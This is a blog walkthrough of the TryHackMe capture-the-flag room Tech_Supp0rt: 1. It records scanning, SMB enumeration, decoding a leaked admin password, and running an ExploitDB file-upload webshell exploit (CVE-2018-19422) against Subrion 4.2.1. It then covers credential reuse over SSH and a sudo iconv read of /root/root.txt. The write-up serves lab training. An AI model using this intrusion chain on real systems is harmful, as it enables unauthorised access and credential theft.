DEV Community

Cover image for TryHackMe Tech_Supp0rt: 1 Walkthrough
Krishna
Krishna

Posted on

TryHackMe Tech_Supp0rt: 1 Walkthrough

TryHackMe Page for the Machine => https://tryhackme.com/room/techsupp0rt1

Enum

rustscan nmap

rustscan -a 10.10.26.146 -- -A

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ=
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18468/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42676/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 46039/udp): CLEAN (Timeout)
|   Check 4 (port 2861/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-11-04T17:24:12+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-04T11:54:12
|_  start_date: N/A

Enter fullscreen mode Exit fullscreen mode

SMB Server Enum

└─$ crackmapexec smb techsupport.thm -u '' -p '' 
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \: 


└─$ crackmapexec smb techsupport.thm -u 'a' -p '' --shares
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \a: 
SMB         techsupport.thm 445    TECHSUPPORT      [+] Enumerated shares
SMB         techsupport.thm 445    TECHSUPPORT      Share           Permissions     Remark
SMB         techsupport.thm 445    TECHSUPPORT      -----           -----------     ------
SMB         techsupport.thm 445    TECHSUPPORT      print$                          Printer Drivers
SMB         techsupport.thm 445    TECHSUPPORT      websvr          READ            
SMB         techsupport.thm 445    TECHSUPPORT      IPC$                            IPC Service (TechSupport server (Samba, Ubuntu))

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ smbclient //techsupport.thm/websvr   
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> PROMPT OFF
smb: \> RECURSE ON
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ ll    
total 4
-rw-r--r-- 1 kali kali 273 Nov  4 08:58 enter.txt

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ cat enter.txt                                         
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
Enter fullscreen mode Exit fullscreen mode

Trying to access this /subrion folder. Did not work in the browser. So tried accessing it via curl

└─$ curl -v http://techsupport.thm/subrion/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:04:03 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; expires=Fri, 04-Nov-2022 13:34:03 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

Enter fullscreen mode Exit fullscreen mode

No wonder its not working. There is a 302 redirect to a strange IP. Also a strange cookie value.

The enter.txt mentions a panel, which I am guessing is some kind of CMS admin panel.

Let's try and find it. Modifying my usual ffuf statement to remove the -r option to ensure redirects are not followed. Also filtering for 302 status codes. Regarding the 302, the server seems to be configured to return a 302 redirect to 10.0.2.15, when we try to access a subfolder of subrion, which will make fuzzing a pain in the behind if we dont handle it properly.

Example

└─$ curl -v http://techsupport.thm/subrion/whatintheworld/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/whatintheworld/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:21:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; expires=Fri, 04-Nov-2022 13:51:48 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/whatintheworld/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

Enter fullscreen mode Exit fullscreen mode

Note: Also removed the -recursion option. There is a / after FUZZ. If we don't add this, the server returns a 301 with the slash added. But for the recursion option to work, the FUZZ keyword needs to be the last thing on the URL string.

Now, let's fuzz!

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://techsupport.thm/subrion/FUZZ/ -o ffuf/raftLarge -of html -ic -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf -t 50 -fc 302 

install                 [Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms]
updates                 [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms]
panel.php               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.sql               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.bak               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.db                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel                   [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.html              [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.zip               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.txt               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.gz                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]

Enter fullscreen mode Exit fullscreen mode

Trying to decode password in Cyberchef.
https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)

Subrion login creds
| user | pass |
| -- | -- |
| admin | CENSORED |

Subrion Admin Portal Enum

After login.

Image description

Subrion Version 4.2.1 is installed. Searching for anything regarding this version on ExploitDB, we get https://www.exploit-db.com/exploits/49876. An arbitrary file upload exploit.

Let's try and use it.

Uploading a reverse shell using CVE-2018-19422

Don't forget to add the slash after panel in the URL when running the exploit.

└─$ python3 49876.py -u http://techsupport.thm/subrion/panel/ --user=admin --passw=CENSORED
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://techsupport.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ipmrjrdahkbtipn

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar 

$ 

Enter fullscreen mode Exit fullscreen mode

The above exploit gives us a command shell. Let's pivot to a full featured reverse shell by running a Python3 reverse shell command.
Here are some good examples => https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

With this shell, we can get a foothold on the machine.

Foothold

wp-config.php

/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CENSORED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );


Enter fullscreen mode Exit fullscreen mode

Trying to do an SSH login to the scamsite user(which we found in the home folder) using the above password?

Success!! We now have a proper login shell.

Let's try for privesc

Privesc

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
Enter fullscreen mode Exit fullscreen mode

Looks like we have sudo permissions for one command. Let's see if we can leverage that for privesc.

Yes we can => https://gtfobins.github.io/gtfobins/iconv/#sudo

scamsite@TechSupport:~$ sudo /usr/bin/iconv 8859_1 -t 8859_1 /root/root.txt
/usr/bin/iconv: cannot open input file `8859_1': No such file or directory
CENSORED  -

Enter fullscreen mode Exit fullscreen mode

DONE!!

Also follow me on Mastodon.

Top comments (0)